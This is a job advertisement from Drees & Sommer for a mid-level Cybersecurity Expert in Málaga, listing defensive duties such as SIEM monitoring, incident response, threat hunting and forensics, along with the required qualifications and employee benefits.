Cybersecurity Expert

Drees & Sommer

  • Málaga
  • Permanente
  • Tiempo completo
  • Hace 16 días
Company DescriptionCreating a future worth living for future generations gets us out of bed every morning. Depending on the project, we are consultants, implementers, or both for sustainable, innovative and economical solutions for real estate, industry, energy and infrastructure. Our more than 6,500 employees at 70 locations worldwide support our customers in interdisciplinary teams. Our thinking is both visionary and realistic. We work independently and as part of a team. With passion and the latest technologies. We unite. Join us at Dreso and let's create a world we want to live in.Job DescriptionWe are seeking a dedicated Cybersecurity Expert to join our team and help protect and continuously improve our organization's security posture. In this role, you will monitor and defend our systems in real-time, lead incident response and threat hunting efforts, and drive strategic security enhancements. You'll play a critical part in safeguarding company data and services from cyber threats. This is an exciting opportunity for a mid-level professional who enjoys both hands-on security operations and contributing to long-term security strategy. If you thrive on solving complex security challenges - from rapidly responding to incidents to proactively hunting for hidden threats - and want to make a real impact on our security maturity, we'd love to hear from you.Key Responsibilities:
  • Security Monitoring & Operations:
  • Monitor Security Information and Event Management (SIEM) dashboards and alerts to identify and analyze potential threats in real time.
  • Perform in-depth analysis of suspicious activities, anomalies, and malware indicators; triage security events and escalate incidents as appropriate.
  • Conduct regular vulnerability assessments and support penetration testing efforts to uncover security weaknesses, working with IT teams to remediate findings.
  • Support patch management by tracking critical vulnerabilities and verifying that systems and applications are updated in a timely manner to reduce exposure.
  • Incident Response:
  • Investigate and contain cybersecurity incidents or breaches - coordinate actions such as evidence collection, digital forensic analysis (disk, memory, logs), and system recovery to minimize damage.
  • Lead post-incident analysis to determine root causes and create incident reports with actionable recommendations to prevent recurrence.
  • Develop and maintain incident response playbooks and procedures, ensuring they stay up-to-date with emerging threats and lessons learned from past events.
  • Coordinate with IT infrastructure, development, and business teams during incident response to ensure effective communication and swift resolution of issues.
  • Threat Hunting & Digital Forensics:
  • Proactively hunt for threats lurking in our networks and systems that may evade automated defenses, by analyzing security logs, network traffic, and endpoint data for signs of malicious activity.
  • Develop hypotheses of potential attacker tactics (using frameworks like MITRE ATT&CK) and investigate those leads to uncover stealthy threats; create custom detection queries or scripts to support hunting operations.
  • Perform deep-dive forensic analysis on digital evidence (such as malware samples, system images, memory dumps) to extract indicators of compromise and understand attack techniques.
  • Continuously collaborate with the SOC team to integrate threat hunting findings into improved monitoring rules and to enhance overall incident detection capabilities.
  • Security Architecture & Engineering:
  • Collaborate with IT to design and implement security enhancements across our networks, cloud environments, and applications (e.g., improving network segmentation, hardening configurations, deploying new security tools).
  • Evaluate new security technologies and tools (for example, advanced threat detection platforms or forensic tools), providing input on their potential value and overseeing pilot implementations.
Qualifications
  • Education & Experience: Bachelor's degree in Computer Science, Information Security, or a related field. Approximately 3-5 years of hands-on experience in cybersecurity roles (e.g., SOC Analyst, Security Engineer, Incident Responder, Threat Hunter), or equivalent expertise.
  • Technical Skills:
  • SIEM and Monitoring: Solid experience with SIEM tools (such as Splunk, QRadar, or Microsoft Sentinel) and log analysis - able to write queries, interpret events, and spot anomalies across various log sources.
  • Endpoint & Network Security: Strong knowledge of intrusion detection/prevention systems, endpoint protection/EDR solutions (e.g., Microsoft Defender for Endpoint, CrowdStrike), and firewall/network security technologies.
  • Vulnerability Management: Experience conducting vulnerability assessments (using tools like Nessus, Qualys) and supporting penetration testing; good understanding of network and application security fundamentals to interpret findings and recommend fixes.
  • Incident Response & Forensics: Proven incident response skills - familiar with digital forensics techniques (disk imaging, memory analysis) and malware analysis basics to investigate incidents. Able to follow incident management frameworks (e.g., NIST or SANS) and document findings clearly.
  • Threat Hunting: Ability to proactively hunt for threats using SIEM and EDR data. Comfortable analyzing large datasets to identify patterns or indicators of compromise, and knowledgeable about threat hunting methodologies (hypothesis-driven investigations, use of threat intelligence).
  • Security Architecture Understanding: Good grasp of security architecture principles - capable of assessing system designs for weaknesses and suggesting practical improvements. Familiarity with security frameworks and best practices (such as MITRE ATT&CK, CIS Controls) to guide enhancement efforts.
  • Certifications: Certifications such as CISSP, GIAC (e.g., GCIH, GCFA, GCIA), CEH/OSCP, or other relevant credentials are a plus and will be considered favorably. These demonstrate a foundation of knowledge and a commitment to the field.
Additional Information
  • A dynamic and collaborative environment where cybersecurity is a strategic priority
  • A team that values creativity, initiative, and continuous improvement
  • To ensure your work-life balance, we offer the option of mobile working
  • We promote your professional and personal development through individual training and further education at the Drees & Sommer Academy
  • We support your health with a bonus for sports enthusiasts. We offer the possibility of subscribing to a private health insurance policy
  • Employees benefit from tax advantages related to their commuting expenses for the office
  • Fiscal advantages for employees expenses in meal costs during the worktime. Employee referral program with attractive bonus scheme
  • Supporting career and family by receiving tax benefits for kindergarten expenses

Drees & Sommer